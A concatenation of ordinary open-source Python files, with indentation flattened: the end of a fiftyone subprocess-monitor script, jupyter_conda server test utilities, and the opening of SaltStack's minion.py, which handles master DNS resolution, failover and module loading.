# also explicitly ignore SIGINT for good measure (note that this MUST be done
# before spinning up the child process, as the child inherits signal handlers)
signal.signal(signal.SIGINT, signal.SIG_IGN)
popen_kwargs = {}
if sys.platform.startswith("win"):
# CREATE_NEW_PROCESS_GROUP: disable ctrl-c
# https://docs.microsoft.com/en-us/windows/win32/procthread/process-creation-flags?redirectedfrom=MSDN
popen_kwargs["creationflags"] = 0x00000200
# use psutil's wrapper around subprocess.Popen for convenience (e.g. it makes
# finding the child's children significantly easier)
child = psutil.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**popen_kwargs,
)
child_stdout = ChildStreamMonitor(child.stdout)
child_stderr = ChildStreamMonitor(child.stderr)
def monitor_stdin():
"""Trigger shutdown when the parent process closes this process's stdin.
This will occur if the :class:`fiftyone.core.service.DatabaseService`
    singleton is destroyed.
This should only occur when the parent process has exited.
"""
while len(sys.stdin.read(1024)):
pass
if args.multi:
client_monitor.notify_parent_exit()
else:
trigger_exit(ExitMode.PARENT)
def shutdown():
"""Kill subprocesses and wait for them to finish.
Also dumps output if the main child process fails to exit cleanly.
"""
# "yarn dev" doesn't pass SIGTERM to its children - to be safe, kill all
# subprocesses of the child process first
try:
# children() returns parent processes first - start with children
# instead to make killing "yarn dev" more reliable
for subchild in reversed(child.children(recursive=True)):
try:
subchild.terminate()
except psutil.NoSuchProcess:
# we may have already caused it to exit by killing its parent
pass
child.terminate()
except psutil.NoSuchProcess:
# child already exited
pass
child.wait()
if exit_mode == ExitMode.CHILD and child.returncode != 0:
sys.stdout.buffer.write(child_stdout.to_bytes())
sys.stdout.flush()
sys.stderr.write(
"Subprocess %r exited with error %i:\n"
% (command, child.returncode)
)
sys.stderr.buffer.write(child_stderr.to_bytes())
sys.stderr.flush()
stdin_thread = start_daemon_thread(target=monitor_stdin)
exiting.wait()
shutdown()
|
utils.py
|
import datetime
import errno
import json
import os
import sys
import time
from binascii import hexlify
from threading import Event, Thread
from typing import List
from unittest import TestCase
from unittest.mock import patch
import jupyter_core.paths
import requests
from ipython_genutils.tempdir import TemporaryDirectory
from tornado.ioloop import IOLoop
from traitlets.config import Config
from jupyter_conda.handlers import NS
# Shim for notebook server or jupyter_server
#
# Provides:
# - ServerTestBase
# - assert_http_error
# - url_escape
# - url_path_join
try:
from notebook.tests.launchnotebook import (
assert_http_error,
NotebookTestBase as ServerTestBase,
)
from notebook.utils import url_escape, url_path_join
from notebook.notebookapp import NotebookApp as ServerApp
except ImportError:
from jupyter_server.tests.launchnotebook import assert_http_error # noqa
from jupyter_server.tests.launchserver import ServerTestBase # noqa
from jupyter_server.utils import url_escape, url_path_join # noqa
from jupyter_server.serverapp import ServerApp # noqa
TIMEOUT = 150
SLEEP = 1
class APITester(object):
"""Wrapper for REST API requests"""
url = "/"
def __init__(self, request):
self.request = request
def _req(self, verb: str, path: List[str], body=None, params=None):
if body is not None:
body = json.dumps(body)
response = self.request(
verb, url_path_join(self.url, *path), data=body, params=params
)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()["message"]
except Exception:
pass
response.raise_for_status()
return response
class JupyterCondaAPI(APITester):
"""Wrapper for nbconvert API calls."""
url = NS
def delete(self, path: List[str], body=None, params=None):
return self._req("DELETE", path, body, params)
def get(self, path: List[str], body=None, params=None):
return self._req("GET", path, body, params)
def patch(self, path: List[str], body=None, params=None):
return self._req("PATCH", path, body, params)
def post(self, path: List[str], body=None, params=None):
return self._req("POST", path, body, params)
def envs(self):
return self.get(["environments"]).json()
class ServerTest(ServerTestBase):
# Force extension enabling - Disabled by parent class otherwise
config = Config({"NotebookApp": {"nbserver_extensions": {"jupyter_conda": True}}})
@classmethod
def setup_class(cls):
# Copy paste from https://github.com/jupyter/notebook/blob/6.0.0/notebook/tests/launchnotebook.py
# Only to suppress setting PYTHONPATH with sys.path
# For notebook v6 we could overwrite get_env_patch but unfortunately it is not available for Python 3.5
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp("home")
data_dir = cls.data_dir = tmp("data")
config_dir = cls.config_dir = tmp("config")
runtime_dir = cls.runtime_dir = tmp("runtime")
cls.notebook_dir = tmp("notebooks")
cls.env_patch = patch.dict(
"os.environ",
{
"HOME": cls.home_dir,
"IPYTHONDIR": os.path.join(cls.home_dir, ".ipython"),
"JUPYTER_NO_CONFIG": "1", # needed in the future
"JUPYTER_CONFIG_DIR": cls.config_dir,
"JUPYTER_DATA_DIR": cls.data_dir,
"JUPYTER_RUNTIME_DIR": cls.runtime_dir,
},
)
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp("share", "jupyter")],
ENV_JUPYTER_PATH=[tmp("env", "share", "jupyter")],
SYSTEM_CONFIG_PATH=[tmp("etc", "jupyter")],
ENV_CONFIG_PATH=[tmp("env", "etc", "jupyter")],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ":memory:"
cls.token = hexlify(os.urandom(4)).decode("ascii")
started = Event()
def start_thread():
if "asyncio" in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = ServerApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize()
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
def setUp(self):
super(ServerTest, self).setUp()
self.conda_api = JupyterCondaAPI(self.request)
def wait_task(self, endpoint: str):
start_time = datetime.datetime.now()
if endpoint.startswith("/" + NS):
endpoint = endpoint[len(NS) + 1 :]
while (datetime.datetime.now() - start_time).total_seconds() < TIMEOUT:
time.sleep(SLEEP)
response = self.conda_api.get([endpoint])
response.raise_for_status()
if response.status_code != 202:
return response
raise RuntimeError("Request {} timed out.".format(endpoint))
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.config
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
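    # Illustrative result for opts like {'master': 'salt.example.com',
    # 'master_port': 4506, 'ipv6': False, ...} when DNS resolution succeeds:
    #   {'master_ip': '203.0.113.10', 'master_uri': 'tcp://203.0.113.10:4506'}
    # (the IP is a documentation address; source_* keys are added only when the
    # corresponding options are set).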
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'])
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
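# For example (following the branches above):
#   prep_ip_port({'master': 'mysaltmaster', 'master_uri_format': 'default'})
#       -> {'master': 'mysaltmaster'}
#   prep_ip_port({'master': '[::1]:1234', 'master_uri_format': 'default'})
#       -> {'master': '::1', 'master_port': 1234}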
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
    mode: anything os.makedirs would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
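    # e.g. get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)
    # ensures /var/cache/salt/minion/proc exists with mode 0700, owned by root,
    # and returns that path.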
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
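# For example, for a function f(a, b=1):
#   load_args_and_kwargs(f, ['foo', {'__kwarg__': True, 'b': 2}])
# returns (['foo'], {'b': 2}); keyword arguments that f does not accept are
# rejected via salt.utils.args.invalid_kwargs() unless ignore_invalid=True.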
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
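    # For example (based on the event_map below):
    #   master_event('connected')        -> '__master_connected'
    #   master_event('alive', 'master1') -> '__master_alive_master1'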
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
def service_name():
'''
Return the proper service name based on platform
'''
return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion'
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        # FIXME: if SMinion doesn't define io_loop, it can't switch master; see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
                            msg = ('Master %s could not be reached, trying '
                                   'next master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
else:
mapping = self.opts['discovery'].get('mapping', {})
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
self.opts['master'] = proto_data['master']
return
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
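# A minimal usage sketch (the config path is an assumption; any valid minion
# config will do):
#
#     import salt.config
#     import salt.minion
#     opts = salt.config.minion_config('/etc/salt/minion')
#     sminion = salt.minion.SMinion(opts)
#     sminion.functions['test.ping']()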
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# If the file client is remote (or use_master_when_local is set), resolve
# and connect to the master before generating modules
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
